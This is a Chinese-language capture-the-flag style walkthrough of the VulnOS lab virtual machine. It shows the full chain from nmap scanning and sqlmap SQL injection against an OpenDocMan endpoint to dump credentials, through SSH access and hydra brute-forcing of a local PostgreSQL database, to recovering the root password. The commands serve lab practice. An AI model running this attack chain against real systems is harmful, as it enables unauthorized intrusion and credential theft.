下载链接
安装
该靶场只能在vxbox中导入,网络模式我选择的桥接
新建虚拟机
将类型改为linux
使用现有虚拟硬盘
正文:
先用nmap扫描靶机ip
nmap -sn 192.168.1.1/24
获取到靶机ip后,对靶机的端口进行扫描,并把结果输出到VulnOS文件夹下,命名为port方便后续查看
nmap -p- 192.168.1.3 -r -PN -A -oA VulnOS/port
(-p-:对所有端口进行探测
-PN:用于禁用主机发现。这些参数告诉Nmap不要执行主机存活检测,而是直接扫描指定的目标
-oA:输出到指定位置
-r:连续扫描端口,并在扫描过程中随机排序目标端口。这可以帮助减少被网络防御系统检测到的风险。
)
对端口指纹进行详细探测,并把结果输出到VulnOS文件夹下,命名为server方便后续查看
nmap -p 22,80,6667 192.168.1.3 -sC -sV -r -O --version-all -A -oA VulnOS/server
(-p:对指定的端口进行探测
-sV:版本信息
-sC:默认脚本扫描
-A:启动Os检测,版本检测,脚本扫描和traceroute
-O:探测操作系统信息
--version-all:尽可能多的探测信息
访问80端口
根据页面提示,打开红色字体的链接
并没有什么动西,但是发现作者老六在Documentation页面,留下了黑色字体信息
根据页面提示,我们找到了登录页面以及账号密码 guest/guest
百度搜索OpenDocMan
获取shell
我们在kali中搜索相关漏洞(searchsploit是一个非常实用的网络安全工具,它是Exploit-DB的一个命令行搜索工具。Exploit-DB是一个公开的漏洞数据库,包含了大量的漏洞利用程序)
searchsploit opendocman 1.2.7
发现相关漏洞文件
将该漏洞文件复制到当前目录下
searchsploit opendocman 1.2.7 -m 32075.txt
读取该文件,我们得到了payload
cat 32075.txt
既然他是sql注入,那直接放到sqlmap中进行尝试
python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 --dbs
python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 -D jabcd0cs --tables
python sqlmap.py -u "http://192.168.1.3/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level 3 -D jabcd0cs -T odm_user --dump
得到账号webmin 密码webmin1980
进行ssh尝试登录
如果出现该提示,则
vi ~/.ssh/known_hosts
将该文件中对应的靶场ip数据删除即可,如若不知道,则全部删除
ssh webmin@192.168.1.3
登录成功
提权
我们在当前目录下发现一个压缩文件
将其进行解压
tar -xzvf post.tar.gz
到解压文件夹下
cd post
发现是暴力破解工具——hydra源码,并且发现有个这个文件,看来是按时我们爆破该数据库啊(postgresql是一款数据库工具)
我们对该源码进行编译
make
提示我们编译前先运行./configure,然后再进行安装
./configure
make
查看是否成功安装
./hydra
安装成功,但是该靶场没有字典,我们回到kali中,打开http服务,将字典下载过来
在kali的
/usr/share/wordlists/metasploit/
路径下有 postgres_default_user.txt 以及 postgres_default_pass.txt字典文件
我们在当前路径下打开http服务
python3 -m http.server 8888
回到靶机shell中,回到初始目录
将两个字典下载过来
wget http://192.168.1.35:8888/postgres_default_user.txt
wget http://192.168.1.35:8888/postgres_default_pass.txt
并将文件重新命名,方便使用(名字太长了)
mv postgres_default_pass.txt pass.txt
mv postgres_default_user.txt user.txt
运行post目录下hydra工具
./post/hydra
可以看到该工具可以直接爆破该数据库
利用字典进行爆破尝试
./post/hydra -L user.txt -P pass.txt postgres://127.0.0.1
爆破出该数据库的账号密码
postgres:postgres
对该数据库进行登录
psql -h 127.0.0.1 -U postgres
登录成功,(postgresql数据库可以看看这篇文档5432,5433 - 渗透测试 Postgresql - HackTricks)
\l #查看所有数据库
\c #指定数据库
\c system
\d #列出表
查看users表内容
select * from users;
如果出现敲入命令没反应,就在后面加上分号,报错后再次进行输入(别忘了分号!)
ok
我们获取到了另一个账号密码
vulnosadmin:c4nuh4ckm3tw1c3
再次尝试登录
ssh vulnosadmin@192.168.1.3
我们发现在该用户目录下有个blend文件
经过查询,该文件为3D 建模应用程序 Blender 的原生 3D 图形文件格式
我们将该文件下载到当前目录下
scp vulnosadmin@192.168.1.3:~/r00t.blend ./
安装blend进行查看该文件
我们隐藏掉图形后,发现在该文件中央藏着一个密码
ab12fg//drg
我们回到靶场shell
su root
输入密码
ab12fg//drg
登陆root账号成功!